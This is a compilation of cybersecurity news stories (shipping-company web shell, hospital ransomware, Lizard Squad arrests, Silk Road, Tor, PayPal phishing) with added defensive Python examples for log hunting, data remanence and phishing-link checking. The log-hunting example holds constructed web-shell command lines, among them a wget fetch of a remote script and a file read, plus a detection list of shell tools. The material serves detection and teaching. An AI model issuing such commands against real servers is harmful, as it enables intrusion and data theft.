Pirates Identify Booty by Hacking Shipping Company

When people talk about “pirates” and “hacking” together, they usually mean those who release software with its digital rights management removed or disabled. This case was different. As revealed in Verizon’s 2015 Data Breach Investigations Report, Verizon’s RISK security response team was called in to assist a global shipping company that had fallen victim to a network intrusion, which was in turn used to support piracy on the high seas.

The incident first came to light when the shipping company noticed an odd pattern in pirate attacks on its vessels. Instead of the usual approach of ransoming a ship’s crew and cargo, the pirates carried out hit-and-run raids, seizing specific high-value shipping containers and making off with those alone.

The response team discovered that the shipping company used a “homegrown” web-based content management system to keep track of what its cargo ships were carrying. Analysis showed that a malicious web shell had been uploaded to the server through a vulnerability in that software. The shell gave the pirates backdoor access to the server, allowing them to upload and download files, including the ships’ bills of lading, and it also exposed a number of user passwords.

Mistakes by the attackers made the intrusion easy for the response team to uncover. The main one was that the web shell talked over plain HTTP even though the server supported SSL, so every byte the pirates sent to and received from the server was visible on the wire. Piecing the captured traffic together, the team could see every command the attackers issued, spelling mistakes included. So while these cyber-attacks were certainly effective when paired with the physical attacks on the ships, the people behind them were seemingly amateurs. Their biggest flaw, however, was a complete disregard for operational security: they used no proxies or other intermediaries and connected directly from their home network. As a result, all it took to end the attacks was blocking the attackers’ IP address. An IP block is a weak control on its own, since an attacker with even basic operational security would simply reconnect from elsewhere; the lasting fixes are removing the web shell, closing the upload vulnerability it came in through and resetting the exposed passwords.
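The same kind of activity can be hunted in a web server’s own access logs, since a command passed in the query string is recorded there whether or not the connection was encrypted. The following is an added example written for this page, not code from the Verizon report or from the shipping company: it parses a handful of constructed combined-format log lines and flags a script sitting in an upload directory that is being fed operating-system commands. The paths, parameter names, IP addresses and token lists are all assumptions about what a typical web shell looks like.

```python
"""Hunting a command-driven web shell in web server access logs.

Added example, not code from the Verizon report or the shipping company.
The log lines, paths, parameter names and IP addresses below are all
constructed; the heuristics are assumptions about what a typical shell looks like.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Apache/nginx combined log format; the request target keeps its query string.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Places where a file-upload feature writes, and extensions a server would execute.
UPLOAD_DIRS = ("/uploads/", "/files/", "/tmp/")
SCRIPT_EXT = (".php", ".asp", ".aspx", ".jsp", ".cgi", ".pl")
# Parameter names shells commonly use to carry the command to run.
CMD_PARAMS = {"cmd", "c", "exec", "command", "run", "shell"}
# Fragments that look like an operating-system command rather than application input.
SHELL_TOKENS = ("wget ", "curl ", "whoami", "cat ", "ls ", "uname", "nc ", "/bin/sh")

# Constructed log lines (documentation-range IP addresses), not a real capture.
CONSTRUCTED_LOG = """\
203.0.113.7 - - [10/Feb/2015:03:12:01 +0000] "GET /index.php HTTP/1.1" 200 5123
198.51.100.9 - - [10/Feb/2015:03:13:44 +0000] "POST /uploads/img.php?cmd=whoami HTTP/1.1" 200 37
198.51.100.9 - - [10/Feb/2015:03:14:02 +0000] "POST /uploads/img.php?cmd=cat+/var/www/bills_of_lading.csv HTTP/1.1" 200 9381
198.51.100.9 - - [10/Feb/2015:03:15:19 +0000] "POST /uploads/img.php?cmd=wget+http://198.51.100.9/dump.py HTTP/1.1" 200 40
203.0.113.7 - - [10/Feb/2015:03:16:00 +0000] "GET /uploads/photo.jpg HTTP/1.1" 200 88123
203.0.113.22 - - [10/Feb/2015:03:17:30 +0000] "GET /uploads/img.php?cmd=uname+-a HTTP/1.1" 200 61
"""


def parse_line(line):
    """Split one log line into its fields; None if it is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["query"] = parse_qs(url.query)       # '+' and %XX are decoded here
    return rec


def command_values(rec):
    """Values of any query parameter whose name is a known command carrier."""
    return [v for k, vals in rec["query"].items() if k.lower() in CMD_PARAMS for v in vals]


def looks_like_webshell(rec):
    """A script living in an upload directory being fed commands, or any request
    whose parameters contain obvious shell syntax."""
    path = rec["path"].lower()
    planted_script = path.startswith(UPLOAD_DIRS) and path.endswith(SCRIPT_EXT)
    cmds = command_values(rec)
    shell_syntax = any(tok in v.lower() + " " for v in cmds for tok in SHELL_TOKENS)
    return (planted_script and bool(cmds)) or shell_syntax


def hunt(log_text):
    """Map each source IP to the commands it issued through a suspected web shell."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and looks_like_webshell(rec):
            hits[rec["ip"]].extend(command_values(rec) or [rec["path"]])
    return dict(hits)


if __name__ == "__main__":
    for ip, cmds in hunt(CONSTRUCTED_LOG).items():
        print(ip)
        for c in cmds:
            print("   ", c)
```

Run against the constructed log, the two source addresses that drove `/uploads/img.php` come out with their full command history, while the ordinary visitor fetching `index.php` and `photo.jpg` is ignored. Commands sent in a POST body rather than the query string would not appear in an access log, which is exactly why a network capture of plain HTTP, as in the incident above, is so valuable to a responder.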

Cyber-crime is a serious threat in its own right, but incidents like this show that attacks combining cyber and physical elements can be the most effective of all. Fortunately, in this case the attackers’ incompetence allowed them to be thwarted, but companies should be more careful than ever to defend themselves not just in the physical world but online too.

Hackers Hit Hollywood Hospital With Ransomware

It seems that no system is beyond the reach of hackers out to line their own pockets. For almost an entire week the Hollywood Presbyterian Memorial Medical Center has been without its computer systems, after an attack described as ransomware took them down.

Without their computer systems, staff at the hospital have been forced to go back to pen and paper for patient records and logs. More worrying is the inability to access patients’ medical records, which could seriously affect the care they receive. Patients needing specific services such as lab tests, scans or pharmacy work have been temporarily transferred to other nearby facilities, as all of these are currently impaired by the attack.

The attack is under investigation by both the LAPD and the FBI, but there is yet to be any conclusive evidence about the culprit. The exact extent of the compromise is unclear, but it is known that the attackers are demanding 9,000 bitcoin, or around $3.5 million, for the decryption key needed to regain access to the hospital’s systems. Allen Stefanek, the hospital’s President and CEO, has stated that the attack was believed to be random rather than maliciously directed at the facility.

It is shocking that a facility as important to so many lives as a hospital can be affected by such an attack with no backups available or any faster way of tackling the issue; tested, offline backups are what turn a week-long outage into a restore job. This should be a wake-up call to other hospitals to toughen up their cyber security, or they could suffer the same fate and put their patients’ lives at risk.

Six Arrested in Lizard Squad Crackdown

Six people in the UK have been arrested for using Lizard Squad’s infamous DDoS tool, Lizard Stresser. Operation Vivarium, co-ordinated by the National Crime Agency (NCA), was a nationwide initiative involving numerous police forces and Regional Organised Crime Units (ROCUs) across the UK. It is estimated that 30% of UK businesses suffered DDoS attacks last year.

According to the NCA website, the following suspects, all male and aged 18 or under, were arrested or interviewed under caution:

  • A 17-year-old male from Manchester had computer equipment seized and was interviewed under caution by the NCA’s National Cyber Crime Unit (NCCU) on 27 August.
  • An 18-year-old male from Huddersfield was arrested and bailed on 27 August by Yorkshire and Humberside police.
  • An 18-year-old male from Milton Keynes was interviewed under caution by the South East ROCU on 26 August.
  • An 18-year-old male from Manchester was arrested and bailed by North West ROCU and Greater Manchester Police on 26 August.
  • A 16-year-old male from Northampton was arrested and bailed by East Midlands ROCU on 26 August.
  • A 15-year-old male from Stockport was arrested by the North West ROCU and Greater Manchester Police on 24 August.

This follows two other arrests earlier this year:

  • A 17-year-old male from Cardiff was arrested and bailed by South Wales ROCU and NCCU on 16 April.
  • A 17-year-old male from Northolt was arrested and bailed by the Metropolitan Police on 03 March.

“By paying a comparatively small fee, tools like Lizard Stresser can cripple businesses financially and deprive people of access to important information and public services,” Tony Adams, Head of Investigations at the NCA’s National Cyber Crime Unit, said. “This multi-agency operation illustrates the commitment of the NCA and its partners to pursuing people who think they can criminally disrupt important public services or legitimate businesses.”

“One of our key priorities is to engage with those on the fringes of cyber criminality, to help them understand the consequences of cyber crime and how they can channel their abilities into productive and lucrative legitimate careers,” he added.

Thank you National Crime Agency for providing us with this information.

Image courtesy of Forbes.

FBI Informant Leads Attacks on Turkish Government

A hacker who turned FBI informant to avoid prison has been leading cyber attacks on Turkey.

Hector Xavier Monsegur, better known under the alias Sabu, has been working with the FBI since his arrest in 2011 on cyber crime charges. Sabu was facing 20 years in prison but was able to make a deal. During this time he has reportedly helped stop over 300 cyber crimes and take down eight of the world’s most prominent hackers from Anonymous.

Now it seems that he was also targeting the Turkish government while under US supervision. Court documents show that his hacking group, Antisec, teamed up with Redhack, a politically motivated Turkish group. Sabu apparently led the attacks and even recruited Jeremy Hammond, who is number one on the FBI’s cyber crime most-wanted list. Chat records show Sabu asking Hammond to take down a number of government websites and to forward any access gained to Redhack.

When Hammond was able to access the details to more than 10 Turkish government servers, he handed all the details to a Redhack member saying: “Get into the boxes and do what you do”.

The FBI insists that all of this was done under the Attorney General’s guidelines, but Sabu has been given a one-year supervision order for his part and Hammond has been sentenced to 10 years in prison.

Thanks to Sky for supplying us with this information.

Image courtesy of Tap Scape

“Oleg Pliss” Apple iPhone Hack Spreads To the USA, UK and New Zealand

On the back of yesterday’s news that Australian Apple devices were being hijacked through the ‘Find My iPhone’ feature, it turns out that the problem is significantly more widespread than first reported. The ‘Oleg Pliss’ attack demands a $100/€100 ransom payment to unlock the device. The number of users affected is growing rapidly, with a thread about the issue on the Apple forums currently at 23 pages, 333 replies and 29,570 views. The problem is now confirmed to have affected iPhone users across the anglophone world: the USA, the United Kingdom, New Zealand and of course Australia.

The Oleg Pliss attack is believed to have started with a batch of phishing emails sent to iOS and OS X users. Those emails are believed to have harvested Apple account credentials, which then allowed the criminals to lock many devices remotely and demand ransoms to unlock them. It goes without saying that anyone affected is advised not to pay: there is no guarantee the criminals would unlock the phone, and even if they did they would still hold the account credentials and could lock it again at any time. Apple recommends that all affected Apple account holders change their passwords immediately; enabling two-step verification on the account, where it is available, also stops a stolen password alone from being enough.

Image courtesy of Engadget

Microsoft Cold Call Virus Scammer Jailed

If you haven’t had one of those stupid phone calls telling you your computer has a virus, I bet you’ve at least heard from a friend or relative that has. Personally, I have had a couple and they’re great fun for trolling them right back, so long as you understand that it is a scam in the first place.

The scam works like this: they cold call people, tell them a virus has been found on their computer and ask for money, in this case between £35 and £150, to remove it. They then give the victim access to software that will supposedly remove the virus. The scam is twofold: not only does this give them a way into your computer and your payment details, but the software they are providing is freely available from Microsoft.

Mohammed Khalid Jamil, 34, from Luton hired people at an Indian call centre to operate this scam. Heading one of many similar operations, Jamil was caught in the act and was sentenced this week, receiving a four-month suspended jail sentence and being ordered to pay a £5,000 fine, £5,665 in compensation and £13,929 in prosecution costs.

“We believe it may be the first ever successful prosecution of someone involved in the Microsoft scam in the UK,” said Lord Harris, chairman of the National Trading Standards Board. “It’s an important turning point for UK consumers who have been plagued by this scam, or variants of it, for several years. Many have succumbed to it, parting with significant sums of money, their computers have been compromised and their personal details have been put at risk. Now that one of the many individuals who’ve been operating this scam has been brought to justice, it’s a stark warning to anyone else still doing it that they can be caught and will be prosecuted.”

Unfortunately we doubt this is the end of such scams, but hopefully it will shed some light on them so that fewer people fall for them in the future.

Thank you BBC for providing us with this information.

Image courtesy of Electricpig.

Criminals Can Recover Personal Details From Used Phones, Even After Factory Reset

A recent Channel 4 investigation into the used phone trade in the UK has exposed some worrying privacy concerns. An investigation into two of the largest second-hand phone retailers, CEX and Cash Converters, revealed that many phones still hold recoverable personal data once sold. The data left behind on the devices, or recoverable from them, includes photos, text messages, passwords, credit card information and internet history. This is despite Cash Converters and CEX telling customers that their devices will be wiped of all personal data before being sold.

The issue arises from these companies assuming that a “factory reset”, or its equivalent, is enough to wipe all personal data from the device. In reality a factory reset typically removes the file system’s references to the data rather than the data itself, so the contents of the flash memory remain recoverable. One security expert Channel 4 spoke to says the data can be recovered easily with freely available software and about 10 minutes of work.

“The phones look like they’re completely blank, but the data is still there in the memory,” said Glenn Wilkinson of SensePost. “You can use software to find it, and that software is freely available for download. I can teach you how to access the data in 10 minutes.”

The extent of information that people store on their phones means that for criminals and fraudsters second hand phones are a goldmine of valuable and sensitive private information.

The Chief Executive of one of the major pawn brokers, Cash Converters, stated that:

“All phones are wiped to a standard level and full factory restores are carried out,” said Mr Patrick. “It is our understanding that specialist software may still be able to recover certain information stored on the phone, but we do everything in our power to ensure all personal data is removed from the device.”

However, the clear moral of the story is that if you are selling your phone, make sure you have securely removed all of your data to the best of your ability. In some cases the manufacturer’s reset function will be enough, but in others it may not be and specialist data removal software may be needed. Two checks worth making: if the device supports full-disk encryption, enable it before the reset, since discarding the key leaves nothing readable behind; if it does not, overwrite the storage (for example by filling it with junk data after the reset) rather than relying on the reset alone.
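To make the difference between “forgetting” data and erasing it concrete, here is an added example written for this page; it is not code from the Channel 4 investigation or from SensePost. It simulates a tiny flash image with an allocation index in front of a data area, performs a quick reset that clears only the index, and then carves the “deleted” records straight out of the raw bytes, before showing that a full overwrite leaves nothing to carve. The image layout, record names and sample contents are all constructed.

```python
"""Data remanence after a 'factory reset', simulated on a tiny flash image.

Added example; not code from the Channel 4 investigation or SensePost.
The image layout (an allocation index followed by a data area), the record
names and the sample contents are all constructed for illustration.
"""
import re

IMAGE_SIZE = 4096   # bytes of simulated flash
INDEX_SIZE = 256    # bytes reserved for the index at the start of the image

# Constructed records, not real data.
SAMPLE_RECORDS = [
    ("sms/0001", b"SMS from +44 7700 900123: your code is 482913"),
    ("card/visa", b"4111111111111111 exp 09/17"),
    ("wifi/home", b"psk=correct horse battery staple"),
]


def build_image(records):
    """Lay records out in the data area and describe them in the index as name:offset:length."""
    image = bytearray(IMAGE_SIZE)
    offset = INDEX_SIZE
    entries = []
    for name, payload in records:
        image[offset:offset + len(payload)] = payload
        entries.append(("%s:%d:%d" % (name, offset, len(payload))).encode())
        offset += len(payload) + 1              # leave a zero byte between records
    index = b"\n".join(entries)
    if len(index) > INDEX_SIZE:
        raise ValueError("index does not fit")
    image[:len(index)] = index
    return image


def _index_entries(image):
    raw = bytes(image[:INDEX_SIZE]).split(b"\x00", 1)[0]
    return [entry for entry in raw.split(b"\n") if entry]


def list_files(image):
    """What a normal file browser shows: only the names the index still points at."""
    return [entry.split(b":")[0].decode() for entry in _index_entries(image)]


def read_file(image, name):
    """Read a record through the index, the way the phone's own software would."""
    for entry in _index_entries(image):
        n, off, ln = entry.split(b":")
        if n.decode() == name:
            return bytes(image[int(off):int(off) + int(ln)])
    raise FileNotFoundError(name)


def quick_reset(image):
    """The fast 'factory reset': forget where the files are, but leave their bytes in place."""
    image[:INDEX_SIZE] = bytes(INDEX_SIZE)


def secure_wipe(image):
    """Overwrite the whole medium, index and data area alike."""
    image[:] = bytes(IMAGE_SIZE)


def carve_strings(image, min_len=8):
    """Forensic carving: pull printable runs straight out of the raw bytes, ignoring the index."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode() for m in re.finditer(pattern, bytes(image))]


def find_card_numbers(image):
    """Anything that looks like a 16-digit card number among the carved strings."""
    return [m.group() for s in carve_strings(image) for m in re.finditer(r"\b\d{16}\b", s)]


if __name__ == "__main__":
    img = build_image(SAMPLE_RECORDS)
    quick_reset(img)
    print("after reset, visible files:", list_files(img))
    print("after reset, carved:", carve_strings(img))
    secure_wipe(img)
    print("after overwrite, carved:", carve_strings(img))
```

After `quick_reset` the device reports no files at all, yet `carve_strings` still returns the text message, the card number and the Wi-Fi passphrase, because only the index was cleared. Only `secure_wipe`, which touches every byte, leaves the carver empty-handed; a device that encrypts its data area and throws away the key on reset achieves the same result without the overwrite.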

Image courtesy of the Guardian

Ross Ulbricht, Alleged Creator Of Silk Road, Pleads Not Guilty To All Charges

Alleged founder and operator of the Bitcoin-based black-market website Silk Road, Ross Ulbricht, has reportedly pleaded not guilty to all charges brought against him by the US government. The charges are incredibly serious, including narcotics trafficking, computer hacking, money laundering and engaging in a continuing criminal enterprise, the last of which is usually reserved for the biggest Mafia- or cartel-style bosses.

Previous speculation had suggested that Ross Ulbricht would cooperate with prosecutors in return for a more lenient sentence by helping with the arrest and prosecution of other figures in the “dark web” drug trade in which he was apparently a key player. That speculation was based on the arrest of three more alleged Silk Road employees in December and the arrest last month of Bitcoin Foundation vice chairman Charlie Shrem, who was charged with money laundering related to Silk Road.

Mr Ulbricht’s trial is not due to take place until November 2014, and in the meantime the defence and prosecution will be able to review and prepare their evidence for the expected four- to six-week trial. Ulbricht’s defence is expected to attack the enforcement methods used by the prosecution, citing illegal or improper surveillance techniques.

More details can be found here.

Image courtesy of Ross Ulbricht (Google +) 

FBI Seizes Record 144,336 Bitcoins – Worth $28 Million

RT reports that the FBI has just made its biggest seizure of bitcoins to date: a staggering 144,336, worth an estimated $28 million at current market value. The FBI claims to have seized the “secret stash” of bitcoins belonging to the founder and owner of the Silk Road online marketplace. The bitcoins apparently belonged to “Dread Pirate Roberts”, Ross Ulbricht’s alias on Silk Road. In the two years of Silk Road’s operation an estimated $1.2 billion was traded in bitcoin, on which Silk Road charged between 8 and 15% commission.

It is claimed that despite having seized hundreds of thousands of bitcoins in shutting down Silk Road, the FBI still cannot use them, because it lacks the password to the encrypted wallet that holds them. Ulbricht’s $80 million of personal wealth in bitcoin thus remains inaccessible to the FBI, protecting the value and integrity of the currency from intervention by the authorities (for the time being at least).

Image courtesy of George Frey/Getty Images/AFP

Cryptic Software And Bournemouth University Team Up To Train Students In Cyber Security

Cyber security is becoming an increasing concern for everyone: businesses, schools, hospitals, governments and even everyday home users. That is why we were interested to see security company Cryptic Software teaming up with Bournemouth University to offer students the chance to train and work in cyber security while taking related degrees there, namely the BSc in Digital Forensics and Security.

As part of the joint venture Bournemouth University will get access to £500,000 worth of computer hardware and software to set up a dedicated cyber security unit, £250,000 of which is provided by the UK government’s Higher Education Innovation Fund (HEIF).

The unit is expected to be profitable too: Bournemouth University expects to earn £250,000 from consultancy work in the first year, rising to £3 million by the end of the third. With cyber crime costing the UK around £27 billion, the state-of-the-art research to be undertaken at Bournemouth in partnership with Cryptic is intended to help secure the international competitiveness of UK firms in the online services industry.

Image courtesy of Bournemouth University 

The FBI Admits It Controlled Freedom Hosting Tor Servers

Wired reports that the FBI has admitted to hacking into Freedom Hosting and taking control of it. Freedom Hosting was a Tor-based hosting service that was shut down about six weeks ago after being seeded with malware that identified its users. Since the malware did nothing other than identify visitors to certain child pornography websites, speculation suggested that the FBI was behind the hack and was using it to identify criminals for prosecution. Six weeks later, that speculation appears to have been correct.

At the same time, Freedom Hosting’s reported owner, Eric Eoin Marques, was arrested in Ireland and is currently awaiting extradition to the USA, where he faces up to 100 years in prison on charges that include facilitating child pornography and abuse websites. He has already been denied bail twice, as the Irish authorities consider him a flight risk. Marques has apparently already sent the earnings of his profitable Freedom Hosting business to his girlfriend in Romania.

Image courtesy of Tor

Russian Botnet Taking Over Tor Network, Now Accounts For 80% Of Users

Reports suggest that a Russian botnet has managed to infiltrate and flood the Tor network. The number of Tor users has been rising slowly as people look to protect themselves from government surveillance and pay more attention to their privacy, but an increase of over two million users in less than a month looks very strange. Apparently the reason is that most of these two million new users are nodes in a Russian botnet. The botnet is not new either; it has switched to Tor for communication with its command and control servers, making their location much more difficult to discover.

Why would it want to hide its central servers? Well, the botnet is probably actively involved in cyber crime of some kind: click fraud, stealing bank account details, ransomware and the like. By shielding the location of its command and control servers it makes it difficult for any police service to locate and shut them down. Whether the Tor network can be overloaded by all these botnet nodes is another matter. I am sure we will find out in the coming weeks what the consequences are.

Image courtesy of Tor Project

41% Of Online Fraud Victims Never Recover Lost Funds Says Kaspersky Report

According to a recent Kaspersky Lab report and survey, things do not look good for online fraud victims. Apparently 41% of victims did not recover any of the lost funds, while 45% recovered all of it and 14% recovered part of it. 33% of victims had money stolen during an e-payment checkout, 17% during online banking sessions and 13% while shopping online.

Sadly only 12% of online store customers who were defrauded received full compensation; for online banking the figure was 15%. Kaspersky Lab says this means only one thing: that companies, consumers and businesses should all take more care to use appropriate protection when dealing with money online.

As expected, the majority of consumers assume that their bank or retailer is responsible for protecting them: 34% of respondents take no security measures when using public Wi-Fi, while 45% believe the bank will return any stolen money. These incidents are relatively common, with around 62% of respondents having encountered an attempt to steal their financial details, but the average cost of an attack was only about $74 per person.

Image courtesy of Kaspersky Labs

German Security Provider Says 750 PayPal Phishing Sites Are Created Daily

PayPal phishing schemes drive me mad. I probably get about 5-10 emails every day across my various work and personal email accounts trying to trick me into handing over PayPal details. A German email security provider has shed light on why this is such a frequent occurrence: apparently an average of 750 new PayPal phishing sites are set up every day. By simple arithmetic that means more than 22,000 of these rotten things every month and over 270,000 in an average year.

Most of these phishing pages are hosted on legitimate websites that have been compromised by cybercriminals, so a phishing site may not be as obvious to spot as you think. The check that always works is to look at the hostname your browser actually connects to rather than whether “paypal.com” appears somewhere in the address: links such as paypal.com.login.example, paypa1.com or https://paypal.com@203.0.113.5/ all contain the brand name, and none of them is PayPal.
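Here is that hostname check as an added example written for this page, not code from Eleven Research or Commtouch. It extracts the host a browser would really connect to (dropping any username before an @, the port and the trailing dot, and converting international names to their xn-- form), accepts only paypal.com and its genuine subdomains, and otherwise explains which trick the link is using. The trusted-domain list, the confusable-character table and the sample URLs are constructed for illustration.

```python
"""Check whether a link really points at PayPal, rather than merely mentioning it.

Added example; not code from Eleven Research or Commtouch. The trusted-domain
list, the confusable-character table and the sample URLs are constructed.
"""
from urllib.parse import urlsplit

TRUSTED = {"paypal.com"}

# Substitutions commonly used to build look-alike names (assumed, not exhaustive).
CONFUSABLES = {"0": "o", "1": "l", "3": "e", "5": "s", "rn": "m", "vv": "w"}


def _with_scheme(url):
    return url if "://" in url else "http://" + url


def connect_host(url):
    """The hostname the browser will really connect to: userinfo and port removed,
    international names converted to their xn-- form, lowercased, trailing dot dropped."""
    host = urlsplit(_with_scheme(url)).hostname or ""
    try:
        host = host.encode("idna").decode("ascii")
    except UnicodeError:
        pass                         # leave an unencodable name as-is; it is still untrusted
    return host.rstrip(".").lower()


def on_trusted_domain(host):
    """True only for the trusted domain itself or a genuine subdomain of it."""
    return any(host == d or host.endswith("." + d) for d in TRUSTED)


def deconfuse(host):
    """Undo the usual character swaps so that paypa1.com reads as paypal.com."""
    for fake, real in CONFUSABLES.items():
        host = host.replace(fake, real)
    return host


def classify(url):
    """None for a genuine PayPal link; otherwise a short reason the link is suspect."""
    host = connect_host(url)
    if on_trusted_domain(host):
        return None
    authority = _with_scheme(url).split("://", 1)[1].split("/", 1)[0]
    if "@" in authority:
        return "userinfo trick: text before '@' is a username, the real host is " + host
    if host.startswith("xn--") or ".xn--" in host:
        return "internationalised domain name (%s): check each character" % host
    for d in TRUSTED:
        if host.startswith(d + ".") or "." + d + "." in host:
            return "trusted name used as a subdomain of " + host
        if on_trusted_domain(deconfuse(host)):
            return "look-alike host %s resembles %s" % (host, d)
        if d in urlsplit(_with_scheme(url)).path.lower():
            return "brand name only in the path; the host is " + host
    return "host %s is not a PayPal domain" % host


SAMPLE_URLS = [                       # constructed
    "https://www.paypal.com/signin",
    "https://paypal.com.secure-login.example/",
    "https://paypal.com@198.51.100.23/login",
    "http://paypa1.com/webscr",
    "https://example.com/paypal.com/login",
    "https://www.p\u0430ypal.com/",   # Cyrillic 'а' in place of Latin 'a'
]

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(u, "->", classify(u) or "genuine")
```

Only the first sample URL passes; each of the others is rejected with the specific trick named, which is more useful in a mail filter or a user-facing warning than a bare “suspicious” verdict. The confusable table is deliberately small; a production filter would use a full Unicode confusables list and the public suffix list rather than a hand-written set.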

“The online payment service PayPal is not only one of the most popular online payment methods, but also a preferred target for phishers: PayPal regularly tops the lists of phishing topics worldwide. Every day, an average of 750 newly compromised websites are targeted primarily at PayPal users, according to numbers from Commtouch’s GlobalView URL filtering database – resulting in more than 22,000 new sites per month and 270,000 sites per year. The sites are usually legitimate websites that are compromised through security flaws. The findings highlight the need for hosters and website owners to protect their sites and for users to deploy an effective Web security solution.” Stated Eleven Research.

Image courtesy of Eleven Research

Tor Powered “Freedom Hosting” Goes Offline From Hacking, Operator Arrested

The Tor service is well known throughout the world as a private networking service that routes traffic through relays run by other members of the network to protect everyone’s identity. However, Tor has also been exploited for illegal purposes, such as by criminal organisations and for viewing illegal content. The hosting company “Freedom Hosting” sits at the centre of one of the most famous and long-running incidents. Freedom Hosting has been associated with hosting a whole variety of bad material, including child pornography, and over the years it has been hacked numerous times by Anonymous and other hacktivist groups for the illegal and immoral content it hosts. Freedom Hosting is not in any way associated with the people behind Tor; it simply ran on top of the public Tor service.

Just recently the Tor network saw a large number of hidden service addresses disappear. They vanished at the same time as Eric Eoin Marques, Freedom Hosting’s owner, was arrested in Ireland on an American warrant issued in Maryland, according to the Irish Examiner. The Tor Project has already publicly disassociated itself from Freedom Hosting. As well as the owner/operator being arrested, the sites were hacked so that visitors to the child pornography websites were redirected to a page that harvested their IP addresses. This has led many to believe the FBI is behind the attack and used it to reveal the identities of the users of those illegal websites.

Image courtesy of Tor

EU Adopts Tough Anti-Cybercrime Legislation

Cybercrime is a growing problem of the modern age, and on Thursday the European Parliament adopted a new set of rules to fight it with a tougher stance. The new measures passed by 541 votes to 91, and all EU member states must transpose them into national law within two years.

The new directive states that offences such as interfering with data and information systems, intercepting communications or selling hacking tools must be punishable by a maximum term of imprisonment of at least two years. Attacks against critical infrastructure that cause serious damage must carry a maximum of at least five years, and building botnets a maximum of at least three.

Furthermore, cooperation between member states is meant to improve, and states are told to collect statistics on cyberattacks and to have authorities in place that can process such data and respond to attacks.

“This is an important step to boost Europe’s defences against cyber-attacks. Attacks against information systems pose a growing challenge to businesses, governments and citizens alike. Such attacks can cause serious damage and undermine users’ confidence in the safety and reliability of the Internet” said Cecilia Malmström, EU Commissioner of Home Affairs.

Image courtesy of capreform.eu